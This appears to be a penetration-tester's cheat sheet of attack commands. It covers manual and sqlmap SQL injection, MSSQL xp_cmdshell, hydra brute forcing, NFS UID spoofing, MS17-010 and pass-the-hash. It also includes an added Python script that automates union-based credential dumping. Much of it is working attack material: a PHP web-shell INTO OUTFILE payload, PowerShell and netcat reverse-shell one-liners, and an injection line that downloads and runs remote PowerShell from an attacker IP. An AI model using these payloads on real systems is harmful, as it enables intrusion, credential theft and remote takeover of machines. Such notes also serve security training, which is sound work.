When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
- Does it initiate an HTTP or HTTPS connection?
- Does it access a web application specific path or route?
- Does the exploit leverage a pre-authentication vulnerability?
- If not, how does the exploit authenticate to the web application?
- How are the GET or POST requests crafted to trigger and exploit the vulnerability?
- Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
- Will oddities such as self-signed certificates disrupt the exploit?
- Use `'` and `"` to look for possible errors.
- Use `#` and `-- ` for comments after the injection. After `--` a space is required; if the `--` ends up in a URL, add something behind it so the trailing space doesn't get truncated, for example `-- \\`.
- If returning multiple rows gives errors, use `LIMIT 1` in the query.
- Use `ORDER BY` to find the number of columns: increment it by 1 until no output (or an error) is shown.
- Use `load_file('C:/Windows/System32/drivers/etc/hosts')` to read files from disk instead of database data (the MySQL user needs the FILE privilege).
- Use `"<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '<PATH TO WEBROOT>/backdoor.php'` to create a simple PHP backdoor (needs the FILE privilege, a writable webroot, and `secure_file_priv` not blocking the path).
- https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- Find the SQL injection
  - Use `'` and `"` to look for possible errors. A vulnerable parameter looks like `artist=1`.
- Find the number of columns
  - Use `artist=1 ORDER BY 1` and increment it by 1 until no output or an error is given. If `artist=1 ORDER BY 4` gives an error, the number of columns is 3.
- Use a union-based SQL injection
  - Use `artist=1 union select 1,2,3` (one marker per column). If no extra output shows up, make the original row disappear with a non-existent id so only the union row is rendered: `artist=-1 union select 1,2,3`.
  - If a column is a string (or the types don't match), use `artist=-1 union select NULL,NULL,NULL` and swap in a value one column at a time.
- Fetch the name of the database and the version/current user
  - `artist=-1 union select 1,database(),3`
  - `artist=-1 union select 1,version(),current_user()`
- Fetch the table names inside the database
  - Retrieve all table names: `artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()`
  - Get the first table name (limited to the first row by `limit 0,1`): `artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1`
  - Get the second table name (`limit 1,1`): `artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1`
  - Get the rest of the table names by incrementing the offset in `limit <n>,1`.
- Retrieve column names
  - `artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'`
- Get data out of the columns
  - `artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>`
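The manual procedure above, automated end to end as an added example (this is not code from the page). The target is a constructed in-memory SQLite database standing in for the `artist=` endpoint, so the schema queries use SQLite's `sqlite_master` and `pragma_table_info()` (needs SQLite 3.16 or newer) where MySQL would use `information_schema`; the MySQL form is noted in the comments. Table names, column names and credentials are made up.

```python
import sqlite3


def build_vulnerable_app():
    """Constructed stand-in for the vulnerable web app: returns a page() function
    that behaves like ?artist=<value> on a site that concatenates the parameter
    straight into its SQL."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists(id INTEGER, name TEXT, genre TEXT);
        INSERT INTO artists VALUES (1, 'Band One', 'rock'), (2, 'Band Two', 'jazz');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!'), (2, 'bob', 'hunter2');
    """)

    def page(artist_param):
        # The injection: no quoting, no parameterisation.
        sql = "SELECT id, name, genre FROM artists WHERE id=" + artist_param
        try:
            # The page renders name and genre only; the id column is never reflected.
            return [(name, genre) for _id, name, genre in con.execute(sql)], None
        except sqlite3.Error as exc:
            return [], str(exc)

    return page


def looks_injectable(page):
    """Step 1: a stray quote should change the response (error or empty page)."""
    rows, err = page("1'")
    return err is not None or not rows


def count_columns(page, max_cols=20):
    """Step 2: ORDER BY n fails once n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        rows, err = page(f"1 ORDER BY {n}")
        if err or not rows:
            return n - 1
    raise RuntimeError("more than max_cols columns")


def find_reflected(page, ncols):
    """Step 3: UNION SELECT 1,2,...,n with an impossible id so only our row renders.
    Markers that appear in the output map SQL position -> index in the rendered row."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows, err = page(f"-1 UNION SELECT {markers}")
    if err or not rows:
        raise RuntimeError(err or "union row not rendered")
    return {int(v): idx for idx, v in enumerate(rows[0])
            if str(v).isdigit() and 1 <= int(v) <= ncols}


def extract(page, ncols, reflected, expr, tail=""):
    """Step 4: put an expression in a reflected position and read it back."""
    pos = min(reflected)
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[pos - 1] = expr
    rows, err = page("-1 UNION SELECT " + ",".join(parts) + tail)
    if err or not rows:
        raise RuntimeError(err or "nothing extracted")
    return rows[0][reflected[pos]]


def run_attack(page):
    """Runs the whole manual procedure and returns what each step learned."""
    if not looks_injectable(page):
        raise RuntimeError("parameter does not look injectable")
    ncols = count_columns(page)
    reflected = find_reflected(page, ncols)
    # MySQL: group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
    tables = extract(page, ncols, reflected, "group_concat(name)",
                     " FROM sqlite_master WHERE type='table'")
    # MySQL: group_concat(column_name) FROM information_schema.columns WHERE table_name='users'
    columns = extract(page, ncols, reflected, "group_concat(name)",
                      " FROM pragma_table_info('users')")
    # MySQL: group_concat(concat(username,':',password)); SQLite concatenates with ||
    creds = extract(page, ncols, reflected,
                    "group_concat(username || ':' || password)", " FROM users")
    return {"columns": ncols, "reflected": sorted(reflected),
            "tables": tables, "user_columns": columns, "creds": creds}


if __name__ == "__main__":
    print(run_attack(build_vulnerable_app()))
```

The same four functions work against a real endpoint once `page()` is replaced by an HTTP request that returns the rendered fields and whether the response looked like an error; the step that changes per backend is only the schema query in `run_attack()`.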
- Use the `--batch` flag to accept the default answer to every question.
- Use the `--wizard` flag for easy mode.
- Use the `--os-shell` flag for an easy shell.
sqlmap -r <BURP REQUEST>
sqlmap -r <BURP REQUEST> --banner
sqlmap -r <BURP REQUEST> --dbs
sqlmap -r <BURP REQUEST> -D <DATABASE> --tables
sqlmap -r <BURP REQUEST> -D <DATABASE> -T <TABLE> --columns
sqlmap -r <BURP REQUEST> -D <DATABASE> -T <TABLE> -C <COLUMN>,<COLUMN> --dump
sqlmap -r <BURP REQUEST> --dump
sqlmap -r
show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;
mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell 'whoami'
a ') EXEC xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/amsi.txt''); iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/Invoke-PowerShellTcp2.ps1'')'; --
- Is the webserver running IIS, PHP, Java? Find out what it is running, since that decides which extensions to fuzz for:
- IIS = .asp, .aspx
- PHP = .php
- Java = .jsp
/opt/SecLists/Discovery/Web-Content/web-extensions.txt
- Check if login is allowed as anonymous:anonymous.
nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1
RETR 2
evil-winrm -u <USER> -p <PASS> -i <IP>
https://github.com/danielmiessler/SecLists
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>
Log in using Burp, or inspect the request in the browser developer tools, to get the required information: you need the username/password/# parameter names, the form's path, and the error message shown on a failed login.
https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"
#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/#.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"
#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/#.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'
cewl <URL> -m <MIN CHARS> -w <FILE>.txt
hashid <HASH>
hash-identifier
unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt
Portmapper and RPCBind run on TCP port 111
rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script "*nfs*"
showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT>,username=<USERNAME>,password=<PASSWORD> //<IP>/<SHARE> /mnt/<FOLDER>
If a file is found that we want to access but don't have permission for, create a local user with the same username, change its UID in /etc/passwd to the UID that owns the file (NFS checks the numeric UID, not the name), and switch to that user to access the file.
sudo adduser pwn
sudo vim /etc/passwd
- msfvenom https://netsec.ws/?p=331
sudo nc -nlvp <PORT>
sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT
msfconsole
use multi/handler
set payload <PAYLOAD>
run
. ./powercat.ps1
powercat -l -v -p 10000
- Generator tool https://github.com/mthbernardes/rsg
nc -nv <IP> <PORT> -e /bin/bash
socat TCP4:<IP>:<PORT> EXEC:/bin/bash
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powercat -c <IP> -p <PORT> -e cmd.exe
nc -nlvp <PORT>
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powercat -l -p <PORT> -e cmd.exe
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
<enter> x2
export TERM=xterm-256color
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo
fg
fg
export TERM=xterm-256color
stty rows 46 cols 140
- In your active shell press Ctrl+Z to send your nc session to the background
- Enter `stty raw -echo`
- Enter `fg` to bring your nc session back to the foreground
- `export TERM=xterm-256color`
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe
<?php
// Return the listing of the directory where the file runs (Windows)
system("dir");
?>
<?php
// Executes but prints nothing; exec() only returns the last line of output
exec("ls -la");
?>
<?php
// Executes, returns the entire output as a string (so it must be echoed)
echo shell_exec("ls -la");
?>
<?php
// Executes, writes the raw output straight to the response
passthru("ls -la");
?>
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
The first form uses the empty LM hash (aad3b435b51404eeaad3b435b51404ee); the last form, with the LM part left blank, should work as well.
pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd
https://www.exploit-db.com/exploits/46249
Start a /bin/bash shell outside of tmux first
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=screen